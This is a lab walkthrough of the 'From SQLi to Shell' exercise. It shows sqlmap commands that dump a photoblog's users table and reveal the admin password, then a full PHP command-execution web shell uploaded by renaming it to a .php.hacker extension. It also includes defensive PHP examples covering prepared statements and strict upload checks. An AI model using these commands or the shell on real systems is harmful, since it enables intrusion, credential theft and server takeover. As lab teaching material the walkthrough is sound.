Solution for From SQLi to Shell I
• First Part – > SQL Injection
• Second Part – > Shell Upload
Emre ÖVÜNÇ Intern – İnnovera
FIRST PART: SQL INJECTION
First of all, I scan the vulnerable machine, whose IP is “192.168.1.117”, with “Nmap”. ( e.g. nmap 192.168.1.117 -Pn )
• -Pn to skip host discovery (treat the host as up even if it does not answer ping)
In this case, we can see that only ports 22 and 80 are open on this machine, which means the “ssh” and “http” services are reachable.
Then we visit the web site and explore it (links, content served by the server, …) looking for places to attempt SQL injection, XSS and similar attacks.
As you can see in the last picture, “http://192.168.1.117/cat.php?id=1” attracts attention because the id parameter is a likely SQL injection point.
Let’s check it. I add only a double quote (“) at the end of the link, and the result does not surprise me.
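Why a single double quote is enough to disturb the page, as an added example that is not the photoblog application's own code (the real cat.php is not shown on the page). The query shape is an assumption: the id is spliced into a double-quoted SQL literal, which is the pattern the %22 probe used in the following steps breaks; the table and column names are assumed as well. The hardened function beside it binds the value instead of pasting it into the SQL text.

```php
<?php
// Added example, not the photoblog application's code. Assumptions: a MySQL
// table `categories` (columns id, name) and a PDO connection; the vulnerable
// version interpolates $_GET['id'] inside a double-quoted SQL literal, which is
// why appending a double quote (%22) to ?id=1 leaves an unbalanced quote.

function buildVulnerableQuery(string $id): string
{
    // Vulnerable: untrusted input spliced straight into the SQL text.
    return 'SELECT id, name FROM categories WHERE id = "' . $id . '"';
}

function fetchCategoryVulnerable(PDO $db, string $id): array
{
    return $db->query(buildVulnerableQuery($id))->fetchAll(PDO::FETCH_ASSOC);
}

function fetchCategorySafe(PDO $db, string $id): array
{
    // Hardened: the value travels as a bound parameter, never as SQL text,
    // and is cast to int because the schema only has numeric ids.
    $stmt = $db->prepare('SELECT id, name FROM categories WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The SQL text each probe from the walkthrough produces in the vulnerable
// version. The UNION line is the kind of payload sqlmap builds automatically;
// the users/login/password names are assumptions for illustration only.
$probes = [
    '1',                                             // normal request
    '1"',                                            // the manual test: one stray quote
    '1" UNION SELECT login, password FROM users-- ', // what sqlmap automates
];
foreach ($probes as $p) {
    echo buildVulnerableQuery($p), "\n";
}
```

Running the script prints the three generated statements; the second one ends in two consecutive double quotes, which MySQL rejects as a syntax error, and the third closes the literal and appends a UNION with the rest of the original statement commented out. With fetchCategorySafe the same inputs reach the database as the integer 1 and nothing else.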
We can use “Sqlmap” without exerting too much effort ( e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --dbs )
• --url to specify the target address (here %22 is the URL-encoded double quote)
• --dbs to enumerate DBMS databases
We can see the names of the available databases in the picture. My next step is finding the admin password to access the admin panel.
After that, I can list the tables in a particular database. ( e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --tables -D photoblog )
• --tables to enumerate DBMS database tables
• -D to select the DBMS database to enumerate
Now I get the columns of an important table, like the users table, which may contain user names and passwords. ( e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --columns -T users -D photoblog )
• --columns to enumerate DBMS database table columns
• -T to select the DBMS database table(s) to enumerate
The final part of the SQL injection is getting the data out of the table. ( e.g. sqlmap --url “http://192.168.1.117/cat.php?id=1%22” --dump -T users -D photoblog )
• --dump to dump DBMS database table entries
• --dump-all to dump all DBMS databases' table entries
As you can see from the pictures, I obtain the admin password, which is “P4ssw0rd”.
SECOND PART: SHELL UPLOAD
After a successful login, the picture upload page catches my attention. If I can upload a webshell through the picture upload page, I may gain control of the server.
To do that, I write a simple PHP script (called myShell.php) that runs commands, and save it.
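What a file like myShell.php typically contains, as an added example rather than the author's own script (the original is not shown on the page). It reads the command from the cmd query parameter, which is why the later steps append ?cmd=... to the upload's URL; the file name and the 2>&1 redirection are my choices.

```php
<?php
// Added example of a minimal command-execution web shell, reconstructed here;
// it is not the walkthrough author's file. It runs whatever arrives in the
// cmd query parameter and returns the output, so it is exactly as dangerous as
// it looks: deploy it only on machines you are authorised to test.

header('Content-Type: text/plain');

$cmd = $_GET['cmd'] ?? '';
if ($cmd === '') {
    // No command yet (the bare ?cmd= request): just prove the file is being
    // executed as PHP rather than served as a static upload.
    echo "shell ok: ", php_uname(), "\n";
    exit;
}

// 2>&1 folds stderr into stdout so error messages show up in the browser too.
$output = shell_exec($cmd . ' 2>&1');

echo "uid: ", function_exists('posix_geteuid') ? posix_geteuid() : 'n/a', "\n";
echo "\$ ", $cmd, "\n";
echo $output ?? "(no output)\n";
```

Commands are passed through the URL, so anything with spaces or shell metacharacters must be URL-encoded (for example cmd=cat%20/etc/passwd). The uid line shows which account the web server runs the shell as, which is the first thing to know before looking at privilege escalation.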
When I try to upload “myShell.php”, the web page does not allow it: it rejects the “.php” file extension to protect against this kind of attack.
My next step is renaming it from “myShell.php” to “myShell.php.hacker”, i.e. appending “.hacker” to the file name, so the name no longer ends in “.php”.
Now I try it with the new extension.
Successfully Uploaded !
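Why the rename works, and what a check that does not fall for it looks like: an added example, not the photoblog's upload handler. It assumes the application's check rejects names whose last extension is php and keeps the uploaded file name, which matches what the walkthrough shows. The server-side half of the trick is Apache's mod_mime: when PHP is enabled through AddHandler or AddType for .php, it looks at every dot-separated extension in a file name, so myShell.php.hacker is still handed to the PHP interpreter even though the application's check only saw "hacker".

```php
<?php
// Added example, not the photoblog's upload handler. Assumption: the real check
// denies names whose last extension is "php" and stores the file under its
// original name, which is what the walkthrough shows.

function isAllowedWeak(string $filename): bool
{
    // Looks only at the text after the LAST dot: "myShell.php.hacker" -> "hacker".
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml'], true);
}

function isAllowedStrict(string $filename): bool
{
    // Allow-list of image extensions, exactly one extension permitted, so a
    // PHP extension hidden in the middle of the name is rejected as well.
    $parts = array_map('strtolower', explode('.', $filename));
    array_shift($parts);                 // drop the base name
    if (count($parts) !== 1) {
        return false;
    }
    return in_array($parts[0], ['jpg', 'jpeg', 'png', 'gif'], true);
}

function acceptUpload(string $original): ?string
{
    // Returns the name to store under, or null to reject. The client's name is
    // never reused: random base name, extension taken from the validated input.
    if (!isAllowedStrict($original)) {
        return null;
    }
    $ext = strtolower(pathinfo($original, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, including the one from the walkthrough.
$samples = ['photo.jpg', 'myShell.php', 'myShell.php.hacker', 'myShell.PhP.jpg', '.htaccess'];
foreach ($samples as $name) {
    printf("%-20s weak=%-5s strict=%-5s stored=%s\n",
        $name,
        isAllowedWeak($name) ? 'allow' : 'deny',
        isAllowedStrict($name) ? 'allow' : 'deny',
        acceptUpload($name) ?? '-');
}
```

The weak check lets myShell.php.hacker, myShell.PhP.jpg and even .htaccess through; the strict one accepts only photo.jpg and stores it under a random name. A name check alone is still not the whole fix: the upload directory should also have PHP execution disabled (php_admin_flag engine off in its Directory block, or a handler override) or live outside the document root, so that a bypassed check cannot turn an upload into code execution.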
There are 2 more steps to execute my commands on the server. First, I click the title, which in this case is “MyShell Title”, and go to the page.
After that, I view the page source to find where my shell is stored. I find it ( admin/uploads/myShell.php.hacker ) and browse to that location.
One of the most important parts is that I add “?cmd=” at the end of the URL. ( e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd= )
Another important part is that I write my command after the “=” sign. ( e.g. http://192.168.1.117/admin/uploads/myShell.php.hacker?cmd=ls )
Finally, as you can see in the pictures, I run some commands on the server and see the results in the web page.